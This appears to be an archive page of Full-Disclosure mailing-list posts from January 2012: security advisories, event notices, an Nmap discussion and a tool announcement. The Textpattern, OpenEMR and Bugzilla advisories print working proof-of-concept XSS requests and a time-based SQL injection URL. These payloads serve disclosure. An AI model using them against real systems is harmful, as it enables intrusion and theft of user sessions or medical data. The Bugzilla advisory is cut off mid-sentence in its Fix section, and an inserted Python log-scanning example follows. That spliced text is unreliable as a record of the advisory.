[Full-disclosure] TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System

2012-01-03 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2012-001:
Cross-Site Scripting Vulnerability in Textpattern Content Management System

Published: 1/03/12
Version: 1.0

Vendor: Textpattern (http://textpattern.com/)
Product: Textpattern
Version affected: 4.4.1 before change set 3612

Product description:
Textpattern is an open source content management system originally
developed by Dean Allen. While it is often listed among weblogging tools,
its aim is to be a general-purpose content management system suitable for
deployment in many contexts. Textpattern is written in PHP using a MySQL
database backend.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2011-5019

After extracting the Textpattern source files on to a web server, but
before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/textpattern/setup/index.php' page.

Example(s):

Performing XSS on "ddb" parameter

#Request

POST /textpattern/setup/index.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=printConfig

#Response

HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Content-Type: text/html; charset=utf-8



Checking database connection
Connected
Database alert('123') does not exist or your
specified user does not have permission to access it.

Remediation Steps:
Textpattern change set 3612 includes a fix for this security issue. Upgrade
to the latest version.


Revision History:
12/23/11 - Vulnerability disclosed
12/23/11 - Patch released by vendor
1/03/12 - Advisory published


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.


___
Full-Disclosure - We believe in it.

[Full-disclosure] InfoSec Southwest 2012 CFP First-round Speaker Selections

2012-01-03 Thread I)ruid
Hello,

InfoSec Southwest is proud to announce our keynote speaker and
first-round speaker selections for our 2012 conference.  Our CFP remains
open until February 1st 2012 after which we will make our remaining
final speaker selections.  CFP information is available at:

http://www.infosecsouthwest.com/cfp.html

Keynote Speaker: Peiter "Mudge" Zatko

We're quite excited to have Mudge accept our invitation to be our
Keynote speaker.  One of our goals for this conference is to bring
together a balanced attendance sourcing from the hacker community,
InfoSec professionals communities, as well as the Government and
Military InfoSec community.  Just from our regional area here in Texas
there is a strong presence from all of these communities, and we hope to
draw as many of you from all of these communities outside our regional
area as well.  Mudge was an obvious choice for our keynote, having a
long and solid history with the hacker and professional InfoSec
communities, and more recently with the public sector with his
involvement in DARPA and his Cyber Fast Track initiative.

First-round CFP Speaker Selections:

Lurene "pusscat" Grenier & Nick DePetrillo - Le Chat-SEC
Joshua "jduck" Drake - Exploiting Memory Corruption in the Java Runtime
Joseph "AverageJoe" Giron - Creating Your Own Windows Debugger in C
Gursev Singh Kalra - Attacking CAPTCHAs for Fun and Profit
Karthik Raman - Selecting Features to Classify Malware

For speaker bios and lecture details, please visit the lectures page on
the conference website:

http://www.infosecsouthwest.com/lectures.html

We're also happy to announce the availability of a few advanced training
courses that will be available following the InfoSec Southwest 2012
conference:

The Art of Exploiting SQL Injection - Sumit Siddharth
Binary Literacy: Static Reverse Engineering - Rolf Rolles
Metasploit Mastery - James "egypt" Lee

If you are interested in training, you can find the full details for
these training courses on the conference website:

http://www.infosecsouthwest.com/training.html

Thanks,

-- 
I)ruid, C²ISSP
dr...@caughq.org
http://druid.caughq.org


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2378-1] ffmpeg security update

2012-01-03 Thread Moritz Muehlenhoff

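-------------------------------------------------------------------------
Debian Security Advisory DSA-2378-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
January 03, 2012                       http://www.debian.org/security/faq
-------------------------------------------------------------------------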

Package: ffmpeg
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-4351 CVE-2011-4353 CVE-2011-4364 CVE-2011-4579 

Several vulnerabilities have been discovered in ffmpeg, a multimedia 
player, server and encoder. Multiple input validations in the decoders
for QDM2, VP5, VP6, VMD and SVQ1 files could lead to the execution of
arbitrary code.

For the stable distribution (squeeze), this problem has been fixed in
version 4:0.5.6-3.

For the unstable distribution (sid), this problem has been fixed in
version 4:0.7.3-1 of the libav source package.

We recommend that you upgrade your ffmpeg packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] OFF-Spanish content: FREE ONLINE WEB HACKING COURSE.

2012-01-03 Thread runlvl
Web Hacking & Exploiting Workshop
Format: Online, live
Instructor: Juan Sacco
Cost: 50 usd  ( To pay for the streaming )
Sign up right now at the following link:
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=6S3XRPJFC4ALN

IMPORTANT.
Course cost: Money is collected only to pay for the streaming

Limited places ( because of bandwidth )

Introduction:
The Exploit Pack web application security course focuses on teaching
attendees the different Web vulnerabilities and the way in which they
can be identified manually or automatically. During the course the
theoretical concepts will be taught, followed by hands-on exercises
carried out in the lab specially designed for the course.

Objective:
To provide attendees with the knowledge, tools and techniques needed
to understand the different types of existing Web vulnerabilities, so
that they are then able to identify them themselves.

Instructor:
Juan Sacco is an exploit and rootkit developer and has worked at
various companies such as ESET, Core Security and ArCERT. Right now he
is in charge of developing Exploit Pack, the free, GPL computer
security tool for penetration testing; more info at
http://exploitpack.com

Student material:
- Training slides
- Live CD with the web application security tools used during the
training
- VMware image with the training environment

Duration: 2 intensive classes
Format: Online, live.
Dates: Friday 14 and Friday 21
Time: 19:00 ( GMT -3:00 )
Final exam: Yes ( Passing the final exam is a requirement for
receiving the certificate )

Syllabus:
  1. Error messages and exceptions
  2. Path Disclosure
  3. OS Commanding
  4. Local file read
  5. Local file inclusion
  6. Path Traversal and Null Bytes
  7. Remote file inclusions
  8. HTTP Response Splitting
  9. Uncommon attack vectors
  10. LDAP Injection
  11. PHP preg_replace vulnerabilities
  12. SQL Injection
  13. Blind SQL Injection
  14. Cross Site Scripting (XSS)
  15. Cross Site Request Forgeries / Session Riding
  16. Vulnerabilities in Web 2.0 applications

Questions? jsa...@exploitpack.com


[Full-disclosure] SQL Injection Vulnerability in OpenEMR 4.1.0

2012-01-03 Thread Netsparker Advisories
Information

Name :  SQL Injection Vulnerability in OpenEMR
Software :  OpenEMR 4.1.0 and possibly below.
Vendor Homepage :  http://www.open-emr.org
Vulnerability Type :  SQL Injection
Severity :  Critical
Researcher :  Canberk Bolat
Advisory Reference :  NS-12-001

Description

OpenEMR is a Free and Open Source electronic health records and
medical practice management application. OpenEMR is ONC Complete
Ambulatory EHR certified and features fully integrated electronic
health records, practice management, scheduling, electronic billing
and internationalization.

Details

OpenEMR is affected by a SQL Injection vulnerability in version 4.1.0.
Example PoC url is as follows :

http://example.com/interface/login/validateUser.php?u='%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)%2b'

You can read the full article about SQL Injection vulnerability from
here : http://www.mavitunasecurity.com/sql-injection/.

Solution

The vendor released a patch for this vulnerability. Please see the references.

Credits

It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.

References

Vendor Url / Patch : http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
MSL Advisory Link : http://www.mavitunasecurity.com/sql-injection-vulnerability-in-openemr/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker

Netsparker® can find and report security issues such as SQL Injection
and Cross-site Scripting (XSS) in all web applications regardless of
the platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allow it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
application security scanner.

-- 
Netsparker Advisories, 
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/



[Full-disclosure] [RT-SA-2012-001] Bugzilla: Cross-Site Scripting in Chart Generator

2012-01-03 Thread RedTeam Pentesting GmbH
Advisory: Bugzilla: Cross-Site Scripting in Chart Generator

RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability
in Bugzilla's chart generator during a penetration test.  If attackers
can persuade users to click on a prepared link or redirect them to
such a link from an attacker-controlled website, they are able to run
arbitrary JavaScript code in the context of the Bugzilla installation's
domain.

Details
=======

Product: Bugzilla
Affected Versions: 2.17.1 to 3.4.12, 3.5.1 to 3.6.6, 3.7.1 to 4.0.2,
   4.1.1 to 4.1.3
Fixed Versions: 3.4.13, 3.6.7, 4.0.3, 4.2rc1
Vulnerability Type: Cross Site Scripting
Security Risk: high
Vendor URL: http://www.bugzilla.org
Vendor Status: fixed version released
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2012-001
Advisory Status: published
CVE: CVE-2011-3657
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3657


Introduction
============

"Bugzilla is a 'Defect Tracking System' or 'Bug-Tracking System'. Defect
Tracking Systems allow individual or groups of developers to keep track
of outstanding bugs in their product effectively. Most commercial
defect-tracking software vendors charge enormous licensing fees. Despite
being 'free', Bugzilla has many features its expensive counterparts
lack.  Consequently, Bugzilla has quickly become a favorite of thousands
of organizations across the globe."

(from Bugzilla's homepage)


More Details
============

The chart-generating script chart.cgi contains a method plot(), that
creates a new chart:

sub plot {
    validateWidthAndHeight();
    $vars->{'chart'} = new Bugzilla::Chart($cgi);

    my $format = $template->get_format("reports/chart", "",
                                       scalar($cgi->param('ctype')));

    # Debugging PNGs is a pain; we need to be able to see the error messages
    if ($cgi->param('debug')) {
        print $cgi->header();
        $vars->{'chart'}->dump();
    }

    print $cgi->header($format->{'ctype'});
    disable_utf8() if ($format->{'ctype'} =~ /^image\//);

    $template->process($format->{'template'}, $vars)
      || ThrowTemplateError($template->error());
}

The function's code shows that there is a "debug" parameter, that, if
set, will make the function print out the variable that represents the
chart with the dump() method implemented in Chart.pm:

sub dump {
    my $self = shift;

    # Make sure we've read in our data
    my $data = $self->data;

    require Data::Dumper;
    print "Bugzilla::Chart object:\n";
    print Data::Dumper::Dumper($self);
    print "";
}

The dump() method then prints the given data structures without any
further checks. This includes user-defined variables sent as URL or HTTP
POST parameters, especially "label0". As the content of this variable is
not checked for malicious input, it can be used to inject arbitrary
JavaScript code into the debugging output. In fact, any variable of the
form "labelXXX", where "XXX" is an arbitrary number, will work. The
view() method in chart.cgi also invokes dump() when the "debug"
parameter is set:

sub view {
    [...]
    # If we have having problems with bad data, we can set debug=1 to dump
    # the data structure.
    $chart->dump() if $cgi->param('debug');
    [...]
}

After reporting the bug, the Bugzilla team discovered that almost the
same code is used in report.cgi, too, leading to the same problem:

# Problems with this CGI are often due to malformed data. Setting debug=1
# prints out both data structures.
if ($cgi->param('debug')) {
    require Data::Dumper;
    print "data hash:\n";
    print Data::Dumper::Dumper(%data) . "\n\n";
    print "data array:\n";
    print Data::Dumper::Dumper(@image_data) . "\n\n";
}

Triggering this XSS is more involved though. One attack vector would be
for example to create a Bugzilla account, set one's own real name to
contain JavaScript code, add a new bug and then create a report where
one of the axes is the assignee's real name. Adding the debug=1
parameter to the resulting image URL will then include the name in the
output, triggering the XSS.


Proof of Concept
================

The following URL generates a new chart with debugging output enabled,
containing JavaScript code in the "label0" parameter:

http://www.example.org/bugzilla/chart.cgi
  ?category=-All-
  &datefrom=
  &dateto=
  &label0=alert("XSS")
  &line0=1
  &name=1
  &subcategory=-All-
  &ctype=png
  &action=plot
  &width=600
  &height=350
  &debug=1

The next URL triggers an XSS if one's real name includes JavaScript
code, e.g. 'John Doealert("XSS")':

http://www.example.org/bugzilla/report.cgi
  ?query_format=report-graph
  &x_axis_field=bug_status
  &x_labels_vertical=1
  &y_axis_field=assigned_to_realname
  &format=bar
  &ctype=png
  &action=plot
  &width=600
  &height=350
  &debug=1


Workaround
==========

Manually remove the debugging code from chart.cgi and report.cgi, as it
is not needed for Bugzilla to function properly.


Fix
===

Update to one of the following versions: 3.4.13, 3
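
For defenders checking whether the debug path described in the RedTeam advisory above was requested on their own installation, the following added example (not part of the original advisory and not Bugzilla code) scans web server access-log lines for chart.cgi and report.cgi requests with a true "debug" parameter and notes any "labelXXX" value that carries markup. The log format, the sample lines and all function names are assumptions made for this example.

```python
"""Added example: find access-log requests that reach the debug dump in
chart.cgi / report.cgi. Log format and sample lines are assumptions."""
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory names as printing Data::Dumper output when "debug" is set.
DEBUG_SCRIPTS = {"chart.cgi", "report.cgi"}

# Assumption: Apache common/combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
LABEL_RE = re.compile(r"^label\d+$")   # the advisory's "labelXXX" parameters
MARKUP_RE = re.compile(r"[<>\"']")     # characters that change meaning in HTML


def perl_true(value):
    """Perl treats only '' and '0' as false for a defined string."""
    return value not in ("", "0")


def inspect_line(line):
    """Return a finding for a request that enables the debug dump, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    script = url.path.rsplit("/", 1)[-1]
    if script not in DEBUG_SCRIPTS:
        return None
    # CGI.pm accepts ';' as well as '&' between pairs, so normalise first.
    params = parse_qsl(url.query.replace(";", "&"), keep_blank_values=True)
    debug = [v for k, v in params if k == "debug"]
    # `if ($cgi->param('debug'))` tests the first value only.
    if not debug or not perl_true(debug[0]):
        return None
    markup_in = sorted(
        {k for k, v in params if LABEL_RE.match(k) and MARKUP_RE.search(v)}
    )
    return {
        "ip": m["ip"],
        "script": script,
        "status": int(m["status"]),
        # Stays empty in the report.cgi case, where the injected value is
        # stored data (a real name) and never appears in the URL.
        "markup_in": markup_in,
    }


def scan(lines):
    """Inspect every line and return the findings in input order."""
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jan/2012:10:00:01 +0000] "GET /bugzilla/chart.cgi'
    '?category=-All-&label0=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E'
    '&line0=1&ctype=png&action=plot&debug=1 HTTP/1.1" 200 912',
    '203.0.113.20 - - [03/Jan/2012:10:02:13 +0000] "GET /bugzilla/report.cgi'
    '?query_format=report-graph&y_axis_field=assigned_to_realname&format=bar'
    '&ctype=png&action=plot&debug=1 HTTP/1.1" 200 2048',
    '192.0.2.44 - - [03/Jan/2012:10:05:40 +0000] "GET /bugzilla/chart.cgi'
    '?label0=Open+bugs&line0=1&action=plot&debug=0 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [03/Jan/2012:10:07:02 +0000] "GET /bugzilla/chart.cgi'
    '?action=plot;label12=%3Cimg%20src%3Dx%3E;debug=yes HTTP/1.1" 200 880',
    '192.0.2.44 - - [03/Jan/2012:10:09:55 +0000] "GET /bugzilla/show_bug.cgi'
    '?id=1&debug=1 HTTP/1.1" 200 7301',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

POST bodies are not recorded in access logs, so parameters sent by POST are outside what this check can see.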

Re: [Full-disclosure] Nmap

2012-01-03 Thread Zach C.
Yet another note, this one ARP-related: while true that most devices on
your local network will respond to ARP, it's important to note (as the
wording of "almost certain" implies) that it is possible to purposely
suppress ARP responses to all but a few hosts. I know for certain that the
Linux kernel has a module (and associated toolset) specifically for that
sort of thing called arptables, with usage very similar to iptables if
you're already familiar with that.

There's also a tool (again on *nix) called arping, which is ping but with
ARP requests. Device firewalls (or at least Windows's built in firewall)
tend(s) not to block ARP requests or replies, so arping might be able to
show you those firewalled hosts, too. (That doesn't mean those hosts aren't
properly configured to correctly block incoming traffic, however!)

On Mon, Jan 2, 2012 at 2:10 PM, Gage Bystrom wrote:

> (I don't have the original, so I'll quote this guy)
>
> Nmap has an option to change how it determines if a host is up by
> attempting a port connection instead. I find this to be highly effective.
> Using a couple of standard ports are the best, such as 80, 21, etc. If you
> only have a few ports you're searching for, then drop host discovery and scan
> those specific ports, you'd get the same results but a tad bit less
> overhead (mainly in the sense of stealth or an obsession with not wasting
> bandwidth if you can help it)
> On Jan 2, 2012 1:00 PM, "S Walker" wrote:
>
>>
>> Just an added note to the current replies (which are all great for hosts
>> not in the local broadcast domain): It is almost certain that every device
>> in your local network will respond to an ARP request. nmap does this by
>> default anyway (-PR for local networks), but it's worth bearing in mind, as
>> something local that won't respond to an ARP request is almost certainly
>> not reachable.
>>
>> S
>>
>> 
>> > Date: Mon, 2 Jan 2012 12:03:42 -0500
>> > Subject: Re: Nmap
>> > From: juan.qu...@gmail.com
>> > To: pen-t...@securityfocus.com
>> >
>> > Sorry for the late answer...
>> >
>> > But when you scan for machines that do not answer to ping (it means
>> > answer with an echo reply for each echo request), you could try using
>> > timestamp, and will return timestamp reply, and also information
>> > request and wait for an information reply
>> >
>> > Both could be useful also to detect equipments that do not answer to
>> > ping. And if you want something more "noisy" maybe a network discovery
>> > or a -P0 option.
>> >
>> > Here is a summary of message types with their port (for ICMP protocol).
>> >
>> > 0 Echo Reply
>> > 3 Destination Unreachable
>> > 4 Source Quench
>> > 5 Redirect
>> > 8 Echo
>> > 11 Time Exceeded
>> > 12 Parameter Problem
>> > 13 Timestamp
>> > 14 Timestamp Reply
>> > 15 Information Request
>> > 16 Information Reply
>> >
>> > More detail on: http://www.faqs.org/rfcs/rfc792.html
>> >
>> > Hope it will be useful.
>> >
>> > Regards,
>> >
>> > Juan Pablo.
>> >
>> > On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli
>> >  wrote:
>> > > This would work but it would be kind of "noisy" to open port scan
>> > > every host. Also probably a little more time consuming.
>> > >
>> > > Adding in syn scan or open port scan will create more time required as
>> > > we're now looking for open ports. What if all ports are closed? Will
>> > > it respond to a certain type of ICMP?
>> > >
>> > > I think a great question to ask is: "What is the least-impactful way I
>> > > can very quickly determine what hosts are alive?" without a
>> > > traditional ping sweep.
>> > >
>> > > On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson  wrote:
>> > >>
>> > >> All depends on what you are trying to achieve. I would assume that
>> > >> you are not concerned about monitoring devices seeing you have done
>> > >> a ping sweep with nmap. I agree with others a port scan is going to
>> > >> give you the best idea if a host is active. There are many instances
>> > >> filtering devices can drop icmp or respond for hosts behind them.
>> > >> Open ports and services are the best identifiers. A port has to be
>> > >> open in some form (open or filtered) to interact with in-bound
>> > >> connections. I would recommend a -sS (syn) scan you can opt for
>> > >> standard services or add -p1- for all 65k+ ports. All ports will
>> > >> verify and services/daemons running. There are other options if
>> > >> bandwidth is an issue.
>> > >>
>> > >>
>> > >> On Sep 30, 2011, at 5:17 PM, Ukpong  wrote:
>> > >>
>> > >> > Can somebody suggest the best NMAP commands for identifying hosts
>> > >> > that are not responding to ICMP ping requests?
>> > >> >

[Full-disclosure] Apigee Facebook API - Cross site scripting

2012-01-03 Thread asish agarwalla
Title:
---
Apigee Facebook API - Cross site scripting


Vendor status:
---
[18.12.2011] Vulnerability discovered.
[19.12.2011] Contact with the vendor.
[26.12.2011] Vulnerability patched by vendor.


Introduction

Apigee is for a new internet of APIs - where billions of mobile, tablets,
and set-top apps connect in a web that has moved beyond the browser. Over
200 enterprises and thousands of developers use Apigee technology to make
their APIs better.

Apigee also provides an API to connect Facebook with the Graph API.

web page: http://apigee.com/
Facebook API console : https://apigee.com/console/facebook#


Abstract
---
The Apigee Facebook API does not validate or encode the Facebook response.


Details:

If an attacker posts a malicious script on the victim's wall, sends it in a
message or writes it in a comment, and the victim visits that page through
the Apigee API, the malicious script gets executed. It affects not only the
victim user but also all the users who visit that page using the Apigee API.

Using this vulnerability, an attacker can steal the user's cookie and can
perform all the actions that the user can perform using the Apigee API.

@Asish

Re: [Full-disclosure] captcha

2012-01-03 Thread Ryan Chapman
Awesome topic, I'm looking forward to hearing a lot more about this.
There is a TED talk video explaining it, but not going into the security end of it.

http://blog.ted.com/2011/12/06/massive-scale-online-collaboration-luis-von-ahn-on-ted-com/



On Mon, Jan 2, 2012 at 10:56, Jan van Niekerk  wrote:

> On Sun, Jan 1, 2012 at 3:43 PM, ebhakt  wrote:
> > Hii guys,
> Hii Ebhakt
>
> > I want to know the logic behind creating a captcha imagey
> > I know how the servers are designed and what the captcha security does!!
> > but how the captcha imagae is generated
> > that's my main question !!
> The code that generates captcha imagey is top secret proprietary
> software.  Only the top software engineers of the global captcha
> security firms have access to the source code, and then only when each
> one of them provides half of the security key to decode the system.
> The code is never actually loaded in memory.  If this code ever got
> into the wrong hands then the entire captcha security system would be
> broken.
> >
> > Any ideas , guesses !!
> Maybe do a dictionary attack.
> > Just mail around !!
> >
> > Thanks
> your welcome hopes this helps
>
> 
> 
>
>


-- 
Ryan Chapman
514.245.0498

Re: [Full-disclosure] Slides of our "Hacking IPv6 Networks" training at DEEPSEC 2011

2012-01-03 Thread Vikram Dhillon
Hey Fernando,

I was wondering if the talk was recorded online and is available after
the conference. Could you link me to it, please? Thanks for your time!

- Vikram

On Mon, Dec 19, 2011 at 2:12 PM, Fernando Gont  wrote:
>
> Folks,
>
> We have uploaded *part* of the materials of the DEEPSEC 2011 edition of
> our training "Hacking IPv6 Networks".
>
> The slideware is available at:
> 
>
> Follow Us on twitter: SI6Networks
>
> Thanks!
>
> Best regards,
> - --
> Fernando Gont
> SI6 Networks
> e-mail: fg...@si6networks.com
> PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
>
>
>



[Full-disclosure] [TOOL RELEASE] Technitium MAC Address Changer v6 (FREEWARE)

2012-01-03 Thread Shreyas Zare
Hi,

Technitium MAC Address Changer allows you to change Media Access
Control (MAC) Address of your Network Interface Card (NIC)
irrespective to your NIC manufacturer or its driver. It has a very
simple user interface and provides ample information regarding each
NIC in the machine. Every NIC has a MAC address hard coded in its
circuit by the manufacturer. This hard coded MAC address is used by
windows drivers to access Ethernet Network (LAN). This tool can set a
new MAC address to your NIC, bypassing the original hard coded MAC
address. Technitium MAC Address Changer is a must tool in every
security professional's toolbox.

Visit http://tmac.technitium.com for more information and download links.


NEW FEATURES
============

+= Internet Protocol v6 (IPv6) support added.

+= Works on Windows 7 and Windows 8 (Developer Preview) for both
32-bit and 64-bit.

+= Automatic Update feature added to update software to latest
available version.

+= Update network card vendors list feature allows you to download
latest vendor data (OUI) from IEEE.org.

+= Enhanced network configuration presets with IPv6 support allow you
to quickly switch between network configurations.

+= Command line options with entire software functionality available.
You can select a preset from specified preset file to apply directly.

+= Issues in previous version ironed out.


Visit http://tmac.technitium.com for more information and download links.

Regards,

(If debugging is the process of removing bugs, then programming must
be the process of putting them in --Edsger Dijkstra)

Shreyas Zare
Co-Founder, Technitium
eMail: shre...@technitium.com
Follow @shreyasonline on twitter

Check out Technitium | Blog [http://blog.technitium.com]
Follow @Technitium on twitter



Re: [Full-disclosure] captcha

2012-01-03 Thread Jan van Niekerk
On Sun, Jan 1, 2012 at 3:43 PM, ebhakt  wrote:
> Hii guys,
Hii Ebhakt

> I want to know the logic behind creating a captcha imagey
> I know how the servers are designed and what the captcha security does!!
> but how the captcha imagae is generated
> that's my main question !!
The code that generates captcha imagey is top secret proprietary
software.  Only the top software engineers of the global captcha
security firms have access to the source code, and then only when each
one of them provides half of the security key to decode the system.
The code is never actually loaded in memory.  If this code ever got
into the wrong hands then the entire captcha security system would be
broken.
>
> Any ideas , guesses !!
Maybe do a dictionary attack.
> Just mail around !!
>
> Thanks
your welcome hopes this helps
